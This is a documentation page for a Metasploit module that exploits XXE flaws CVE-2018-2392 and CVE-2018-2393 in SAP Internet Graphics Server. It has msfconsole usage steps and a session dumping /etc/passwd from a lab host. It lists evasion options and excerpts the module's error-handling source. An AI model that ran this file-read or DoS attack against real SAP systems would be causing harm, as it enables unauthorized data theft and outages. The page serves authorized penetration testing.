SAP Internet Graphics Server (IGS) XMLCHART XXE - Metasploit
This page contains detailed information about how to use the auxiliary/admin/sap/sap_igs_xmlchart_xxe metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SAP Internet Graphics Server (IGS) XMLCHART XXE
Module: auxiliary/admin/sap/sap_igs_xmlchart_xxe
Source code: modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
Disclosure date: 2018-03-14
Last modification time: 2021-05-13 04:01:03 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 40080
List of CVEs: CVE-2018-2392, CVE-2018-2393
This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable SAP IGS server.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf auxiliary(sap_igs_xmlchart_xxe) > show targets
... a list of targets ...
msf auxiliary(sap_igs_xmlchart_xxe) > set TARGET target-id
msf auxiliary(sap_igs_xmlchart_xxe) > show options
... show and set options ...
msf auxiliary(sap_igs_xmlchart_xxe) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable SAP IGS server.
Application Background
The Internet Graphics Service (IGS) where it provides a way infrastructure to enable developers to display graphics in an internet browser with minimal effort. It has been integrated in several different SAP UI technologies where it provides a way for data from another SAP system or data source to be utilized to generate dynamic graphical or non-graphical output.
Installation Steps
Steps to install and update the SAP IGS server can be found online on this page. Additional information on configuring the IGS server can be found here. Finally information on administering the IGS server can be found here.
Once set up and configured, the instances will be vulnerable on the default HTTP port 40080.
Verification Steps
- Start msfconsole
- Do:
workspace [WORKSPACE]
- Do:
use auxiliary/admin/sap/sap_igs_xmlchart_xxe
- Do:
set RHOSTS [IP]
- Do:
set FILE [remote file name]
- Do:
set action READ
- Do:
check
- Verify that the
check
method correctly identifies if the target is vulnerable or not. - Do:
run
- Verify that the contents of the file you specified were returned.
Options
FILE
File to read from the remote server. Example: /etc/passwd
URIPATH
This is the path to the XMLCHART page of the SAP IGS server that is vulnerable to XXE.
By default it is set to /XMLCHART
, however it can be changed if the SAP IGS server
was installed under a different path than the web root. For example if the SAP IGS
server was installed to the /igs/
path under the web root, then this value would be
set to /igs/XMLCHART
.
Actions
Name Description
---- -----------
READ Remote file read
DOS Denial Of Service
Scenarios
Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options
Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd no File to read from the remote server
Proxies http:127.0.0.1:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.30.29 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 40080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /XMLCHART yes Path to the SAP IGS XMLCHART page from the web root
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
READ Remote file read
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29
[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.29 40080 tcp http open SAP Internet Graphics Server (IGS)
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2020-10-07 10:12:37 UTC 172.16.30.29 SAP Internet Graphics Server (IGS) XMLCHART XXE CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.30.29 igs.xmlchart.xxe /etc/passwd text/plain SAP IGS XMLCHART XXE /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
Go back to menu.
Msfconsole Usage
Here is how the admin/sap/sap_igs_xmlchart_xxe auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show info
Name: SAP Internet Graphics Server (IGS) XMLCHART XXE
Module: auxiliary/admin/sap/sap_igs_xmlchart_xxe
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2018-03-14
Provided by:
Yvan Genuer
Vladimir Ivanov
Available actions:
Name Description
---- -----------
DOS Denial Of Service
READ Remote file read
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd no File to read from the remote server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 40080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /XMLCHART yes Path to the SAP IGS XMLCHART page from the web root
VHOST no HTTP server virtual host
Description:
This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE
vulnerabilities within the XMLCHART page of SAP Internet Graphics
Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53.
These vulnerabilities occur due to a lack of appropriate validation
on the Extension HTML tag when submitting a POST request to the
XMLCHART page to generate a new chart. Successful exploitation will
allow unauthenticated remote attackers to read files from the server
as the user from which the IGS service is started, which will
typically be the SAP admin user. Alternatively attackers can also
abuse the XXE vulnerability to conduct a denial of service attack
against the vulnerable SAP IGS server.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-2392
https://nvd.nist.gov/vuln/detail/CVE-2018-2393
https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
Module Options
This is a complete list of options available in the admin/sap/sap_igs_xmlchart_xxe auxiliary module:
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show options
Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd no File to read from the remote server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 40080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /XMLCHART yes Path to the SAP IGS XMLCHART page from the web root
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
READ Remote file read
Advanced Options
Here is a complete list of advanced options supported by the admin/sap/sap_igs_xmlchart_xxe auxiliary module:
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show advanced
Module advanced options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/sap/sap_igs_xmlchart_xxe module can do:
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show actions
Auxiliary actions:
Name Description
---- -----------
DOS Denial Of Service
READ Remote file read
Evasion Options
Here is the full list of possible evasion options supported by the admin/sap/sap_igs_xmlchart_xxe auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>
- Error <E.CLASS>: <E>
- Picture
- Errors
- Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>
- Error <E.CLASS>: <E>
- The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.
- The server sent a response but it was not in the expected format. The target is likely patched.
- The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights.
- The server did not respond to the second request in the expected manner and is therefore safe
- Some connection error occurred and it was not possible to determine if the server is vulnerable or not
- <HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched.
- <HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!
- <HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!
- The action <ACTION.NAME> is not a supported action.
- The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.
- The server sent a response but it was not in the expected format. The target is likely patched.
- The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights.
- The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.
- The server responded successfully but the response indicated the server is not vulnerable!
- The server responded successfully but no download link was found in the response, so it is not vulnerable!
- Failed to get <FILE> content!
- Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>
- Error <E.CLASS>: <E>
- The target responded with a 200 OK response code. The DoS attempt was unsuccessful.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>
Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>" error message:
164: 'ctype' => "multipart/form-data; boundary=#{@post_data.bound}",
165: 'data' => @post_data.to_s
166: }
167: )
168: rescue StandardError => e
169: print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
170: vprint_error("Error #{e.class}: #{e}")
171: return -1
172: end
173:
174: # Check first HTTP response
Error <E.CLASS>: <E>
Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:
165: 'data' => @post_data.to_s
166: }
167: )
168: rescue StandardError => e
169: print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
170: vprint_error("Error #{e.class}: #{e}")
171: return -1
172: end
173:
174: # Check first HTTP response
175: if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
Picture
Here is a relevant code snippet related to the "Picture" error message:
170: vprint_error("Error #{e.class}: #{e}")
171: return -1
172: end
173:
174: # Check first HTTP response
175: if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
176: return -2
177: end
178:
179: if first_response.body.include?('Errors')
180: return -3
Errors
Here is a relevant code snippet related to the "Errors" error message:
174: # Check first HTTP response
175: if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
176: return -2
177: end
178:
179: if first_response.body.include?('Errors')
180: return -3
181: end
182:
183: first_response
184: end
Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>
Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>" error message:
195: 'uri' => normalize_uri(@download_link),
196: 'method' => 'GET'
197: }
198: )
199: rescue StandardError => e
200: print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
201: vprint_error("Error #{e.class}: #{e}")
202: return -1 # Some exception was thrown whilst making the second HTTP request!
203: end
204:
205: # Check second HTTP response
Error <E.CLASS>: <E>
Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:
196: 'method' => 'GET'
197: }
198: )
199: rescue StandardError => e
200: print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
201: vprint_error("Error #{e.class}: #{e}")
202: return -1 # Some exception was thrown whilst making the second HTTP request!
203: end
204:
205: # Check second HTTP response
206: if second_response.nil? || second_response.code != 200 || !second_response.body.include?('area shape=rect')
The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.
Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the first request and did not respond in the expected manner." error message:
225: # so that the module can check if the target is vulnerable or not.
226:
227: # Get OS release information
228: check_response = send_first_request
229: if check_response == -1
230: Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231: elsif check_response == -2
232: Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233: else
234: if check_response == -3
235: vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
The server sent a response but it was not in the expected format. The target is likely patched.
Here is a relevant code snippet related to the "The server sent a response but it was not in the expected format. The target is likely patched." error message:
227: # Get OS release information
228: check_response = send_first_request
229: if check_response == -1
230: Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231: elsif check_response == -2
232: Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233: else
234: if check_response == -3
235: vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
236: else
237: result = analyze_first_response(check_response.body)
The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights.
Here is a relevant code snippet related to the "The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights." error message:
230: Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231: elsif check_response == -2
232: Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233: else
234: if check_response == -3
235: vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
236: else
237: result = analyze_first_response(check_response.body)
238:
239: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240: if result == -1 || result == -3
The server did not respond to the second request in the expected manner and is therefore safe
Here is a relevant code snippet related to the "The server did not respond to the second request in the expected manner and is therefore safe" error message:
236: else
237: result = analyze_first_response(check_response.body)
238:
239: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240: if result == -1 || result == -3
241: Exploit::CheckCode::Safe('The server did not respond to the second request in the expected manner and is therefore safe')
242: elsif result == -2
243: Exploit::CheckCode::Unknown('Some connection error occurred and it was not possible to determine if the server is vulnerable or not')
244: end
245:
246: if !@file_content.to_s.empty?
Some connection error occurred and it was not possible to determine if the server is vulnerable or not
Here is a relevant code snippet related to the "Some connection error occurred and it was not possible to determine if the server is vulnerable or not" error message:
238:
239: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240: if result == -1 || result == -3
241: Exploit::CheckCode::Safe('The server did not respond to the second request in the expected manner and is therefore safe')
242: elsif result == -2
243: Exploit::CheckCode::Unknown('Some connection error occurred and it was not possible to determine if the server is vulnerable or not')
244: end
245:
246: if !@file_content.to_s.empty?
247: if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
248: os_release = "OS: #{os_regex[:os]}"
<HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched.
Here is a relevant code snippet related to the "<HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched." error message:
246: if !@file_content.to_s.empty?
247: if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
248: os_release = "OS: #{os_regex[:os]}"
249: end
250: else
251: return Exploit::CheckCode::Safe("#{@host} did not return the contents of the requested file, aka #{os_release_file}. This host is likely patched.")
252: end
253: end
254: # Make ident
255: if os_release != ''
256: ident = "SAP Internet Graphics Server (IGS); #{os_release}"
<HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!
Here is a relevant code snippet related to the "<HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!" error message:
272: refs: references,
273: info: os_release
274: )
275: # Print Vulnerability
276: if os_release == ''
277: Exploit::CheckCode::Vulnerable("#{@host} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
278: else
279: Exploit::CheckCode::Vulnerable("#{@host} running #{os_release} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
280: end
281: end
282: end
<HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!
Here is a relevant code snippet related to the "<HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!" error message:
274: )
275: # Print Vulnerability
276: if os_release == ''
277: Exploit::CheckCode::Vulnerable("#{@host} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
278: else
279: Exploit::CheckCode::Vulnerable("#{@host} running #{os_release} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
280: end
281: end
282: end
283:
284: def run
The action <ACTION.NAME> is not a supported action.
Here is a relevant code snippet related to the "The action <ACTION.NAME> is not a supported action." error message:
286: when 'READ'
287: action_file_read
288: when 'DOS'
289: action_dos
290: else
291: print_error("The action #{action.name} is not a supported action.")
292: end
293: end
294:
295: def action_file_read
296: # Set up XML data for HTTP request
The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.
Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the first request and did not respond in the expected manner." error message:
298: make_post_data(@file, dos: false)
299:
300: # Download remote file
301: first_response = send_first_request
302: if first_response == -1
303: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
304: elsif first_response == -2
305: fail_with(Failure::UnexpectedReply, 'The server sent a response but it was not in the expected format. The target is likely patched.')
306: else
307: # Report Service and Vulnerability
308: report_service(
The server sent a response but it was not in the expected format. The target is likely patched.
Here is a relevant code snippet related to the "The server sent a response but it was not in the expected format. The target is likely patched." error message:
300: # Download remote file
301: first_response = send_first_request
302: if first_response == -1
303: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
304: elsif first_response == -2
305: fail_with(Failure::UnexpectedReply, 'The server sent a response but it was not in the expected format. The target is likely patched.')
306: else
307: # Report Service and Vulnerability
308: report_service(
309: host: @host,
310: port: @port,
The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights.
Here is a relevant code snippet related to the "The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights." error message:
318: name: name,
319: refs: references
320: )
321: # Get remote file content
322: if first_response == -3
323: print_status("The SAP IGS server is vulnerable, but file: #{@file} not found or not enough rights.")
324: else
325: result = analyze_first_response(first_response.body)
326: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
327: if result == -1
328: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.
Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the second request and did not respond in the expected manner." error message:
323: print_status("The SAP IGS server is vulnerable, but file: #{@file} not found or not enough rights.")
324: else
325: result = analyze_first_response(first_response.body)
326: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
327: if result == -1
328: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
329: elsif result == -2
330: print_error('The server responded successfully but the response indicated the server is not vulnerable!')
331: return
332: elsif result == -3
333: print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
The server responded successfully but the response indicated the server is not vulnerable!
Here is a relevant code snippet related to the "The server responded successfully but the response indicated the server is not vulnerable!" error message:
325: result = analyze_first_response(first_response.body)
326: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
327: if result == -1
328: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
329: elsif result == -2
330: print_error('The server responded successfully but the response indicated the server is not vulnerable!')
331: return
332: elsif result == -3
333: print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
334: return
335: end
The server responded successfully but no download link was found in the response, so it is not vulnerable!
Here is a relevant code snippet related to the "The server responded successfully but no download link was found in the response, so it is not vulnerable!" error message:
328: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
329: elsif result == -2
330: print_error('The server responded successfully but the response indicated the server is not vulnerable!')
331: return
332: elsif result == -3
333: print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
334: return
335: end
336:
337: if !@file_content.to_s.empty?
338: vprint_good("File: #{@file} content from host: #{@host}\n#{@file_content}")
Failed to get <FILE> content!
Here is a relevant code snippet related to the "Failed to get <FILE> content!" error message:
337: if !@file_content.to_s.empty?
338: vprint_good("File: #{@file} content from host: #{@host}\n#{@file_content}")
339: loot = store_loot('igs.xmlchart.xxe', 'text/plain', @host, @file_content, @file, 'SAP IGS XMLCHART XXE')
340: print_good("File: #{@file} saved in: #{loot}")
341: else
342: print_error("Failed to get #{@file} content!")
343: end
344:
345: end
346: end
347: end
Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>
Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>" error message:
378: port: @port,
379: name: name,
380: refs: references
381: )
382: rescue StandardError => e
383: print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
384: vprint_error("Error #{e.class}: #{e}")
385: end
386:
387: # Check HTTP response
388: fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
Error <E.CLASS>: <E>
Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:
379: name: name,
380: refs: references
381: )
382: rescue StandardError => e
383: print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
384: vprint_error("Error #{e.class}: #{e}")
385: end
386:
387: # Check HTTP response
388: fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
389: end
The target responded with a 200 OK response code. The DoS attempt was unsuccessful.
Here is a relevant code snippet related to the "The target responded with a 200 OK response code. The DoS attempt was unsuccessful." error message:
381: )
382: rescue StandardError => e
383: print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
384: vprint_error("Error #{e.class}: #{e}")
385: end
386:
387: # Check HTTP response
388: fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
389: end
390:
391: end
Go back to menu.
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14163 Merged Pull Request: SAP Internet Graphics Server (IGS) XMLCHART XXE attack (CVE-2018-2392 and CVE-2018-2393)
References
- CVE-2018-2392
- CVE-2018-2393
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
See Also
Check also the following modules related to this module:
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- auxiliary/admin/sap/cve_2020_6287_ws_add_user
- auxiliary/admin/sap/sap_configservlet_exec_noauth
- auxiliary/admin/sap/sap_mgmt_con_osexec
- auxiliary/dos/sap/sap_soap_rfc_eps_delete_file
- auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt
